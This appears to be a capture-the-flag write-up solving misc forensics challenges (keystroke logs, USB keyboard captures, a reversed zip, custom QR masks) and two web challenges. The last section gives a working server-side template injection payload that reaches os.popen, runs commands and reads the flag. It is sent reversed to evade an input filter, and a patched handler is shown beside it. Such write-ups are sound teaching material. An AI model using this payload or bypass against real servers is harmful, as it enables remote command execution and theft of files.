CBC-DAS
This post was last updated 420 days ago; the information in it may have developed or changed since.

Misc

easy_keyboard

Solution

  • Download the attachment and write a script for the key log:
import re

# Every recorded keystroke is a line containing KeyDown "<key name>"
key_pattern = re.compile('KeyDown "(.*?)"')
with open('secret.Q', 'r') as r:
    content = r.readlines()
a = []
for i in content:
    b = re.findall(key_pattern, i)
    if b:
        a.append(b[0].lower())
print(a)
a = ''.join(a)
# Drop the shift modifier and turn the named keys into the characters they type
# ('\b' is a real backspace, so the terminal erases the previous character when printing)
a = a.replace('shift', '').replace("backspace", '\b').replace('space', ' ').replace('num ', '')
print(a)
  • The output:

if you want to decrypt the zip file.you need to get the key.i am a very good person.
so i will give you the key directly.the key is very easy.
as long as you get the key and you can see the files in the compressed zip
.fine1it’s time to give you the key.the key is 123456.
oh1sorry.this is the key of my bank card password.
the true key is 6e187bef.the key is 6e187bef.the key is 64187bef

  • Rewrite the script so that backspace is not substituted, which makes every correction visible:
if you want to decrypt the zip file.you need to geyt  t the key.
i am a very good person.so i i will give you the key dirte  ectly.
the key is very easy.
as long as you get the key and you can see the files in the compressed zu ip.
fine1it's time to give you the key.the key is 123456.oh1 sorr     sorry.
this is the key of my vba   banc k card password.
the ture   t rue key is 6e187bef.
the key2  is 323d1a4b        6e187bef.
the key3  is f 0 6 7 e c 9 4 64187bef
  • This gives the three keys for the known-plaintext attack on the zip (the ZipCrypto internal state key0, key1, key2; bkcrack accepts them directly with `-k 6e187bef 323d1a4b f067ec94`):
    • 6e187bef
    • 323d1a4b
    • f067ec94
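The same keystroke-log replay as an added example (not the write-up's script): instead of printing raw backspace characters it keeps an editing buffer, so the text the victim actually ended up with and the raw keystream with every correction are both available. It assumes the same log format the write-up's regex matches (one `KeyDown "<name>"` per line, key names such as "shift", "backspace", "space", "num 6") and, like the write-up, lowercases everything and ignores shift. The log below is constructed, not the challenge's secret.Q.

```python
"""Replay a KeyDown log into the text it actually produced (added example)."""
import re

KEY_RE = re.compile(r'KeyDown "(.*?)"')

# Named keys that do not type themselves (assumed names, after the write-up's output)
NAMED = {"space": " ", "enter": "\n", "tab": "\t"}
IGNORED = {"shift", "ctrl", "alt"}   # modifiers: no character of their own


def keys_from_log(text):
    """Extract the key names from a log, in order, lowercased."""
    return [k.lower() for k in KEY_RE.findall(text)]


def replay(keys):
    """Return (raw, edited): raw keeps a visible U+232B for every backspace,
    edited applies the backspace to the buffer, the way the target app saw it."""
    raw, buf = [], []
    for k in keys:
        if k in IGNORED:
            continue
        if k == "backspace":
            raw.append("\u232b")          # visible marker in the raw view
            if buf:
                buf.pop()                 # delete the previously typed character
            continue
        if k.startswith("num "):          # numpad keys: "num 6" -> "6"
            k = k[4:]
        ch = NAMED.get(k, k)
        raw.append(ch)
        buf.append(ch)
    return "".join(raw), "".join(buf)


# Constructed sample log: "the keu" is typed, the typo corrected, then a hex value
# entered partly on the numpad.
SAMPLE_LOG = "\n".join(f'KeyDown "{k}"' for k in [
    "T", "h", "e", "space", "k", "e", "u", "backspace", "y", "space",
    "i", "s", "space", "num 6", "e", "num 1", "num 8", "num 7", "b", "e", "f",
])

if __name__ == "__main__":
    raw, edited = replay(keys_from_log(SAMPLE_LOG))
    print(raw)      # the keu⌫y is 6e187bef   (every correction stays visible)
    print(edited)   # the key is 6e187bef
```

Reading both views is what surfaces the trick in this challenge: the edited text says "the key is 6e187bef", while the raw view shows the two other keys the author typed before backspacing over them.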
  • The zip unpacks to a USB traffic capture; extract the HID report data:

tshark -r keyboard.pcapng -T fields -e usbhid.data > usbdata.txt
The resulting usbdata.txt contains only 4f, 50, 51 and 52, which are outside the keycode range of ordinary letter and digit keys, so we looked up the HID keycode table at https://max.book118.com/html/2017/0407/99227972.shtm
They are the arrow keys (HID usage IDs 0x4F Right, 0x50 Left, 0x51 Down, 0x52 Up):

→↓←↓→ ↓→↑↓↓ ↓→↑↓↓ →←↓→↓← →↓↓↑←↑ →↓←↓→↑←↑ ↓↓→↑← →↓↓ →↓↓ ↓↓ →↓↓ →↓↓ ↓↓ →↓←→↓← →↓←↓→↑←↑ ↓↓→↑← →↓←↓→↑←↑ →↓↓ →↓↓↑←↑ →↓↓←↑↑ →↓←↓→ →↓↓←↑↑ ↓↓→↑← →←↓→↓← →↓↓←↑↑ ↓→↑↓↓ →↓←→↓← →←↓→↓← →↓←↓→↑←↑ →↓←↓→↑←↑ →←↓→↓← →←↓→↓← ↓↓ →↓←↓→ →↓←↓→↑←↑ →↓←→↓← →↓↓↑←↑ →↓↓↑←↑ →←↓→↓← ↓↓ ↓↓→↑← →↓←→↓← →↓↓←↑↑ →↓↓↑←↑ →↓←↓→↑←↑ ↓↓→↑← →↓←↓→ ↓→↑↓↓ →↓←↓→↑←↑ ↓↓→↑← ↓↓ ↓↓→↑← →↓↓ →↓←↓→↑←↑ →↓↓↑←↑ ↓↓ →←↓→↓← →↓↓↑←↑ →↓↓↑←↑ →↓↓←↑↑ ↓↓→↑← →↓←↓→↑←↑ →↓↓←↑↑ →↓↓ ↓→↑↓↓ →↓←→↓← →↓↓↑←↑ ↓↓→↑← ↓→↑↓↓ →↓←↓→↑←↑ →↓↓←↑↑ →↓←→↓← →←↓→↓← →↓↓↑←↑ →↓←↓→↑←↑ →↓←→↓← ↓→↑↓↓ ↓↓→↑← →↓←→↓← ↓→↑↓↓ ↓↓ →↓↓←↑↑ →↓↓ →↓↓←↑↑ →↓←→↓← →←↓→↓← →↓↓←↑↑ ↓↓→↑← →↓←↓→↑←↑ →↓←↓→ →↓←↓→↑←↑ →↓↓↑←↑ ↓→↑↓↓ →↓←↓→ →↓←↓→↑←↑ ↓↓→↑← →↓↓←↑↑ →↓↓ →↓↓←↑↑ →↓↓←↑↑ ↓↓→↑← ↓→↑↓↓ →↓↓←↑↑ ↓↓→↑← →↓←→↓← →↓↓

  • exp: draw every arrow stroke on a canvas so the digits can be read off by eye (`str` below holds the keycode byte of each HID report, joined into one hex string; it shadows the builtin name, which is harmless here)
from PIL import Image
str = "4f5150514f00514f52515100514f525151004f50514f5150004f5151525052004f5150514f5250520051514f5250004f5151004f5151005151004f5151004f5151005151004f51504f5150004f5150514f5250520051514f5250004f5150514f525052004f5151004f5151525052004f5151505252004f5150514f004f51515052520051514f5250004f50514f5150004f515150525200514f525151004f51504f5150004f50514f5150004f5150514f525052004f5150514f525052004f50514f5150004f50514f5150005151004f5150514f004f5150514f525052004f51504f5150004f5151525052004f5151525052004f50514f51500051510051514f5250004f51504f5150004f5151505252004f5151525052004f5150514f5250520051514f5250004f5150514f00514f525151004f5150514f5250520051514f52500051510051514f5250004f5151004f5150514f525052004f5151525052005151004f50514f5150004f5151525052004f5151525052004f51515052520051514f5250004f5150514f525052004f5151505252004f515100514f525151004f51504f5150004f51515250520051514f525000514f525151004f5150514f525052004f5151505252004f51504f5150004f50514f5150004f5151525052004f5150514f525052004f51504f515000514f5251510051514f5250004f51504f515000514f525151005151004f5151505252004f5151004f5151505252004f51504f5150004f50514f5150004f51515052520051514f5250004f5150514f525052004f5150514f004f5150514f525052004f515152505200514f525151004f5150514f004f5150514f5250520051514f5250004f5151505252004f5151004f5151505252004f51515052520051514f525000514f525151004f51515052520051514f5250004f51504f5150004f515100"
img = Image.new('RGB', (len(str), len(str)))  # black canvas, large enough for every stroke
i = 0   # pen x
j = 5   # pen y
print(len(str))
# Walk the hex string one keycode byte (two characters) at a time. Each arrow key
# moves the pen 6 pixels in its direction and draws white; a 00 (key release)
# ends one digit, so the pen is reset and moved 10 pixels to the right.
for n in range(len(str) // 2 - 1):
    print(str[n*2:(n+1)*2])
    if str[n*2:(n+1)*2] == '4f':        # Right Arrow
        for k in range(6):
            i += 1
            img.putpixel((i, j), (255, 255, 255))
    if str[n*2:(n+1)*2] == '51':        # Down Arrow
        for k in range(6):
            j += 1
            img.putpixel((i, j), (255, 255, 255))
    if str[n*2:(n+1)*2] == '50':        # Left Arrow
        for k in range(6):
            i -= 1
            img.putpixel((i, j), (255, 255, 255))
    if str[n*2:(n+1)*2] == '52':        # Up Arrow
        for k in range(6):
            j -= 1
            img.putpixel((i, j), (255, 255, 255))
    if str[n*2:(n+1)*2] == '00':        # key release: start the next digit
        j = 5
        i = i + 10
img.show()

  • The digits read off the rendered image, then converted from a big integer to bytes:
2445986771771386879020650435885512839951630986248616789159906807439648035983463410703506828942860700640637

from libnum import *  # n2s: big integer -> bytes
flag=2445986771771386879020650435885512839951630986248616789159906807439648035983463410703506828942860700640637
print(n2s(flag))
  • Another exp, which walks the raw pcapng at fixed offsets instead of going through tshark:
import libnum

# In this capture the first USB packet's data starts at file offset 1340, every
# packet block is 0x80 bytes long, and the first keycode byte of the HID report
# sits 57 bytes into each block. These offsets are specific to this file.
f = open("keyboard.pcapng", "rb").read()
pos = 1340
# Each digit 0-9 is "drawn" with a sequence of arrow strokes, written in numpad
# notation: 8 = up, 2 = down, 4 = left, 6 = right
draws = ["622488","22","62426","624624","26822","642624","22684","622","62426848","622848"]
chars = ["0","1","2","3","4","5","6","7","8","9"]
c = ""
while pos < len(f):
    data = f[pos + 57]
    if data == 0x52:      # Up Arrow
        c += "8"
    elif data == 0x51:    # Down Arrow
        c += "2"
    elif data == 0x50:    # Left Arrow
        c += "4"
    elif data == 0x4f:    # Right Arrow
        c += "6"
    elif data == 0:       # key release: end of one digit
        c += " "
    pos += 0x80
c = c.split(" ")[:-1]     # drop the empty string after the final release
ans = ""
for i in c:
    ans += chars[draws.index(i)]
print(libnum.n2s(int(ans)))
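The decoding the two exps above do by hand (render and read) or by file offsets, as one added example that works from the tshark output of the extraction step instead (not the write-up's code). It assumes the dump is what `tshark -r keyboard.pcapng -T fields -e usbhid.data` prints: one 8-byte boot-protocol keyboard report per line, either as "00:00:4f:00:00:00:00:00" or "00004f0000000000" depending on the Wireshark version, with empty lines for packets that carry no HID data. The stroke table is the write-up's `draws`; the report lines below are constructed, not from the challenge capture.

```python
"""Decode arrow-key "stroke digits" from a tshark usbhid.data dump (added example)."""

# HID usage IDs of the arrow keys (USB HID Usage Tables, keyboard page), mapped to
# the numpad-direction notation the write-up's `draws` table uses.
ARROW_TO_DIR = {0x4F: "6", 0x50: "4", 0x51: "2", 0x52: "8"}  # right/left/down/up

# Stroke sequence for each digit 0-9, as drawn on the keypad (from the write-up)
DRAWS = ["622488", "22", "62426", "624624", "26822",
         "642624", "22684", "622", "62426848", "622848"]
DIGIT_OF_STROKE = {s: str(i) for i, s in enumerate(DRAWS)}


def parse_reports(dump):
    """Yield the first keycode byte of every 8-byte report in the dump."""
    for line in dump.splitlines():
        hexstr = line.strip().replace(":", "")
        if not hexstr:
            continue          # packet carried no HID data
        report = bytes.fromhex(hexstr)
        if len(report) != 8:
            raise ValueError(f"unexpected report length: {line!r}")
        yield report[2]       # byte 0 = modifiers, byte 1 = reserved, byte 2 = first key


def strokes_from_keycodes(keycodes):
    """Group arrow presses into strokes; an all-zero (release) report ends a stroke."""
    strokes, current = [], ""
    for kc in keycodes:
        if kc == 0:
            if current:       # collapse runs of releases into one separator
                strokes.append(current)
                current = ""
        elif kc in ARROW_TO_DIR:
            current += ARROW_TO_DIR[kc]
        else:
            raise ValueError(f"non-arrow keycode 0x{kc:02x} in stroke data")
    if current:
        strokes.append(current)
    return strokes


def decode_dump(dump):
    """stroke -> digit, digits -> big integer -> bytes (what libnum.n2s does)."""
    digits = "".join(DIGIT_OF_STROKE[s] for s in strokes_from_keycodes(parse_reports(dump)))
    n = int(digits)
    return n.to_bytes((n.bit_length() + 7) // 8, "big")


def _reports(codes):
    """Constructed tshark-style lines, one report per keycode (0 = release)."""
    return "\n".join(f"00:00:{c:02x}:00:00:00:00:00" for c in codes)


# Constructed sample: the strokes for the digits of int.from_bytes(b"CB") = 17218,
# one release report after each digit, plus one empty line as tshark prints it.
SAMPLE_DUMP = "\n".join([
    _reports([0x51, 0x51, 0]),                                      # "22"       -> 1
    _reports([0x4F, 0x51, 0x51, 0]),                                # "622"      -> 7
    "",                                                             # packet without HID data
    _reports([0x4F, 0x51, 0x50, 0x51, 0x4F, 0]),                    # "62426"    -> 2
    _reports([0x51, 0x51, 0]),                                      # "22"       -> 1
    _reports([0x4F, 0x51, 0x50, 0x51, 0x4F, 0x52, 0x50, 0x52, 0]),  # "62426848" -> 8
])

if __name__ == "__main__":
    print(decode_dump(SAMPLE_DUMP))   # b'CB'
```

One caveat when reusing this on other captures: a real keyboard sends a release report after every single press, whereas this challenge's capture (and the author's data) only has a release between digits, which is what makes the all-zero report usable as a digit separator.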

what_is_it.piz

Solution

  • It is a zip written backwards; a script to restore it:
a = ...  # the hex dump exported from the hex editor, as one string
# Reverse the dump character by character and write it back out
with open('a.txt', 'w') as w:
    w.write(a[::-1])
  • Remove the extra 00 bytes in front of the file header to get a valid archive.
  • Unzipping reveals a Word document, so rename the archive's extension to .doc.
  • Open it: it is a song. Look up the original lyrics, compare them with the document, and pull out the letters missing from the misspelled words:

hylqeygvs
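The reversal and trimming steps above as an added example (not the write-up's script). The write-up reverses the hex dump as text, which repairs a file that was reversed at hex-digit (nibble) granularity; a file reversed byte by byte needs its bytes reversed instead, and the two are not interchangeable. The function below tries both, looks for the local file header signature `PK\x03\x04`, and drops the zero padding that lands in front of it. The sample archive is built in memory here, not taken from the challenge.

```python
"""Recover a zip whose bytes were written backwards and zero-padded (added example)."""
import io
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"


def candidates(data):
    """The two plausible un-reversals of the data: byte-wise and nibble-wise."""
    yield "bytes", data[::-1]
    yield "nibbles", bytes.fromhex(data.hex()[::-1])


def recover_zip(data):
    """Return (how, archive_bytes) for the first candidate that contains a zip header."""
    for how, cand in candidates(data):
        at = cand.find(ZIP_LOCAL_HEADER)
        if at != -1:
            return how, cand[at:]          # strip the leading 00 padding
    raise ValueError("no PK\\x03\\x04 signature found in either orientation")


def make_sample(reverse_nibbles=False, pad=b"\x00" * 4):
    """Constructed sample: a one-file zip, zero-padded at the end, then reversed."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("note.txt", "hello from inside the piz\n")
    raw = buf.getvalue() + pad
    return bytes.fromhex(raw.hex()[::-1]) if reverse_nibbles else raw[::-1]


def names_in(archive_bytes):
    """Entry names of a recovered archive; raises if the archive is still broken."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        return zf.namelist()


if __name__ == "__main__":
    for nib in (False, True):
        how, fixed = recover_zip(make_sample(reverse_nibbles=nib))
        print(how, names_in(fixed))       # bytes ['note.txt'] / nibbles ['note.txt']
```

Trimming to the first `PK\x03\x04` is the programmatic form of "delete the extra 00 in front of the file header"; searching for the signature rather than stripping zeros also copes with padding that is not all zero.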

  • According to the challenge hint, the order of these letters has to be brute-forced.
  • Official exp:
from string import ascii_uppercase as uppercase
from itertools import cycle
import hashlib

# Vigenère tableau: table[k] is the alphabet rotated to start at key letter k
table = dict()
for ch in uppercase:
    index = uppercase.index(ch)
    table[ch] = uppercase[index:] + uppercase[:index]

# deTable maps a key letter to its additive inverse mod 26 (A->A, B->Z, C->Y, ...),
# so encrypting with deKey(key) is the same as decrypting with key
deTable = {'A': 'A'}
start = 'Z'
for ch in uppercase[1:]:
    index = uppercase.index(ch)
    deTable[ch] = chr(ord(start) + 1 - index)


def deKey(key):
    return ''.join([deTable[i] for i in key])


def encrypt(plainText, key):
    result = []
    # cycle() repeats the key letters for as long as the plaintext runs
    currentKey = cycle(key)
    for ch in plainText:
        if 'A' <= ch <= 'Z':
            index = uppercase.index(ch)
            # next key letter
            ck = next(currentKey)
            result.append(table[ck][index])
        else:
            result.append(ch)
    return ''.join(result)


key = "TREX"
keys = deKey(key)


# Try every ordering of the extracted letters (pailie = permutation), decrypt it
# with the key, and report the ones whose MD5 starts with the known prefix
def Pailie(list1, start, end):
    if start == end:
        q = "".join(list1)
        ans = encrypt(q, keys)
        # print(ans)
        flag = hashlib.md5(ans.encode()).hexdigest()
        if flag.startswith("5613a"):
            print(ans, flag)
    else:
        for i in range(start, end + 1):
            list1[start], list1[i] = list1[i], list1[start]
            Pailie(list1, start + 1, end)
            list1[start], list1[i] = list1[i], list1[start]


mw = ['H', 'Y', 'L', 'E', 'V', 'S', 'G', 'Q', 'Y']
Pailie(mw, 0, len(mw) - 1)
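The lyrics-comparison step earlier in this solution (find the original lyrics, compare, take the letters missing from the misspelled words) as an added example, not the write-up's code. It assumes the tampered text keeps the original word order and word count and only has letters removed inside words; a word that differs in any other way is reported separately so it can be checked by hand. Both texts below are constructed, not the song from the challenge.

```python
"""Pull out the letters that were dropped from a tampered text (added example)."""
import difflib


def dropped_letters(original, tampered):
    """Return (letters, suspicious): letters removed from each word, in text order,
    and the (original, tampered) pairs that differ by more than deletions."""
    orig_words, tamp_words = original.split(), tampered.split()
    if len(orig_words) != len(tamp_words):
        raise ValueError("word counts differ; align the texts first")
    letters, suspicious = [], []
    for ow, tw in zip(orig_words, tamp_words):
        if ow == tw:
            continue
        ops = difflib.SequenceMatcher(None, ow, tw, autojunk=False).get_opcodes()
        if all(tag in ("equal", "delete") for tag, *_ in ops):
            letters.extend(ow[i1:i2] for tag, i1, i2, _, _ in ops if tag == "delete")
        else:
            suspicious.append((ow, tw))   # substitution/insertion: not a plain omission
    return "".join(letters), suspicious


# Constructed sample: one letter is missing from each of four words, and one word
# only differs in capitalisation (flagged, not counted).
ORIGINAL = "silver moon above the harbour lights, the tide is turning slow"
TAMPERED = "silvr moon above the harbor lihts, the Tide is turnng slow"

if __name__ == "__main__":
    print(dropped_letters(ORIGINAL, TAMPERED))  # ('eugi', [('tide', 'Tide')])
```

The extracted string is the input to the permutation search above: the letters come out in text order, which is not necessarily the intended order, hence the brute force.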

mask

Solution

  • A rar is appended to the zip; extract it to get the rules of the custom masks:

mask0:(i+j) % 2
mask1:j % 2
mask2:i % 3
mask3:(i+j) % 3
mask4:(i//3+j//2)%2
mask5:(i*j)%3+(i*j)%2
mask6:((i*j)%3+i*j)%2
mask7:((i*j)%3+i+j)%2
mask8:(i*j) % 2
mask9:(i*j) % 3
mask10:(i^j) % 3
mask11:(i^j) % 2
mask12:(i//3+j//2)%3
mask13:(i^j)%3+(i^j)%2
mask14:((i^j)%3+i^j)%2
mask15:((i^j)%3+i+j)%2

  • These are the 16 redefined masks. The first 8 are the original QR mask rules, only in a different order, so when scanning all the QR codes some may still scan directly: the random choice happened to give those codes their original mask.
  • Open any of the QR code PNGs in StegSolve: there are traces of hidden data in the top-left corner of the Red plane 0 (LSB).
  • Checking a few more images, only the first four pixels carry hidden data. Combined with the description saying the mask's identifying feature is not inside the QR code area, this 4-bit value is the identifier of one of the 16 masks…
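The 16 mask rules above as runnable un-masking code, added here as an example (not the challenge's or the write-up's code). It assumes the QR convention that a data module is inverted where the rule's expression is 0, with i = row and j = column, and it hard-codes the function-pattern layout of a version-1 (21x21) symbol: the three finder patterns with their separators and format bits, plus the two timing lines, which are never masked. The rules are typed exactly as listed, so Python's operator precedence applies (`^` binds looser than `+`). Masking is an XOR, so the same call both masks and unmasks; the matrix used below is constructed.

```python
"""Apply / remove one of the 16 custom QR masks (added example)."""

MASKS = [
    lambda i, j: (i + j) % 2,
    lambda i, j: j % 2,
    lambda i, j: i % 3,
    lambda i, j: (i + j) % 3,
    lambda i, j: (i // 3 + j // 2) % 2,
    lambda i, j: (i * j) % 3 + (i * j) % 2,
    lambda i, j: ((i * j) % 3 + i * j) % 2,
    lambda i, j: ((i * j) % 3 + i + j) % 2,
    lambda i, j: (i * j) % 2,
    lambda i, j: (i * j) % 3,
    lambda i, j: (i ^ j) % 3,
    lambda i, j: (i ^ j) % 2,
    lambda i, j: (i // 3 + j // 2) % 3,
    lambda i, j: (i ^ j) % 3 + (i ^ j) % 2,
    lambda i, j: ((i ^ j) % 3 + i ^ j) % 2,    # literal: (((i^j)%3 + i) ^ j) % 2 in Python
    lambda i, j: ((i ^ j) % 3 + i + j) % 2,
]
SIZE = 21  # version 1 symbol (assumed)


def is_function_module(i, j, size=SIZE):
    """True for modules carrying finder/separator/format/timing info, not data."""
    if i < 9 and j < 9:                 # top-left finder + separator + format bits
        return True
    if i < 9 and j >= size - 8:         # top-right finder + separator + format bits
        return True
    if i >= size - 8 and j < 9:         # bottom-left finder + separator + format/dark module
        return True
    return i == 6 or j == 6             # timing patterns


def apply_mask(matrix, mask_id):
    """XOR the data region with mask `mask_id`; returns a new matrix of 0/1 ints."""
    rule = MASKS[mask_id]
    return [
        [
            bit ^ (0 if is_function_module(i, j) else int(rule(i, j) == 0))
            for j, bit in enumerate(row)
        ]
        for i, row in enumerate(matrix)
    ]


def mask_pattern(mask_id):
    """The bare mask as a matrix (1 = inverted module), handy for eyeballing a rule."""
    return apply_mask([[0] * SIZE for _ in range(SIZE)], mask_id)


if __name__ == "__main__":
    # Constructed sample: a blank symbol; masking twice must give it back.
    blank = [[0] * SIZE for _ in range(SIZE)]
    for m in range(16):
        once = apply_mask(blank, m)
        assert apply_mask(once, m) == blank
        print(f"mask {m:2d}", "".join("#" if b else "." for b in once[9][9:16]))
```

To unmask a challenge image, read the module matrix from the PNG, pick the mask id from the 4 hidden bits, call `apply_mask(matrix, mask_id)`, and re-apply the corresponding standard mask (or write the modules back with the format information adjusted) before handing the symbol to a decoder.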

Web

小恐龙

Solution

  • Read the source, forge the cookie, get the flag.

Text reverser

Solution

  • This should be SSTI. There is a long list of filters, but they only inspect the raw data we send, not the string after the server has reversed it, so sending the payload already reversed bypasses them:
output = '''{% print "".__class__.__bases__[0].__subclasses__()%}'''[::-1]
print(output)
  • Send the reversed payload to get the list of classes, then paste the returned list into a script to find a usable one:
a = """
<class 'type'>...<class 'unicodedata.UCD'>
"""   # paste the returned __subclasses__() list here

# Split the dump on ">" into one entry per class, ignoring newlines and commas,
# so the list index of each class is preserved
allList = []
result = ""
for i in a:
    if i == ">":
        result += i
        allList.append(result)
        result = ""
    elif i == "\n" or i == ",":
        continue
    else:
        result += i

# os._wrap_close.__init__.__globals__ is the os module's namespace, which has popen
for k, v in enumerate(allList):
    if "os._wrap_close" in v:
        print(str(k) + "--->" + v)
  • Then use popen through that class to execute system commands (the index found above is 132 here):
{% print "".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('ls').read()%}
}%)(daer.)'galf/ ln'(]'nepop'[__slabolg__.__tini__.]231[)(__sessalcbus__.]0[__sesab__.__ssalc__."" tnirp %{
  • Many file-reading commands are filtered, but `nl` slips past the filter and reads the file (later testing showed `grep`, `rev` and similar commands also read the flag).
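The bypass described above, modelled as an added example (not the challenge's source): the blocklist is an assumption standing in for the challenge's filter, the vulnerable handler does what the write-up observed (check the raw input, reverse it, then hand the reversed string to the template engine), and the payload builder and class-index lookup are the write-up's two steps in reusable form. No template engine is involved; `render` only records what would reach it, so the example runs offline.

```python
"""Why filtering the raw input of a reverse-then-render endpoint fails (added example)."""
import re

BLOCKLIST = ("{%", "{{", "__class__", "__subclasses__", "popen", "flag")  # assumed


def blocked(s):
    return any(term in s for term in BLOCKLIST)


def ssti_payload(index, cmd):
    """The write-up's popen payload with the subclass index and command filled in."""
    return ('{% print "".__class__.__bases__[0].__subclasses__()[' + str(index) +
            "].__init__.__globals__['popen']('" + cmd + "').read() %}")


def subclass_index(listing, name="os._wrap_close"):
    """Index of `name` in a printed __subclasses__() list (the write-up's lookup)."""
    return re.findall(r"<class '([^']+)'>", listing).index(name)


def vulnerable_handler(user_input):
    """Filters the raw input, then renders the reversed string: the filter never
    sees the text the template engine sees."""
    if blocked(user_input):
        return "rejected"
    return "render:" + user_input[::-1]


def fixed_handler(user_input):
    """Filter the exact string that would be rendered, and do not treat it as a
    template at all: return the reversed text as plain data."""
    reversed_text = user_input[::-1]
    if blocked(reversed_text):
        return "rejected"
    return "text:" + reversed_text


# Constructed response from the class-dump stage (three classes only)
LISTING = "[<class 'type'>, <class 'weakref'>, <class 'os._wrap_close'>]"

if __name__ == "__main__":
    idx = subclass_index(LISTING)                  # 2 here; 132 on the challenge box
    attack = ssti_payload(idx, "nl /flag")[::-1]   # reversed, so the raw check passes
    print(blocked(attack), vulnerable_handler(attack)[:40])  # False render:{% print ""...
    print(fixed_handler(attack))                   # rejected
```

The real fix is the second half of `fixed_handler`: user input must never reach `render_template_string` (or any template compile) as template source, reversed or not; filtering the post-transformation string is only a stopgap for code that still does.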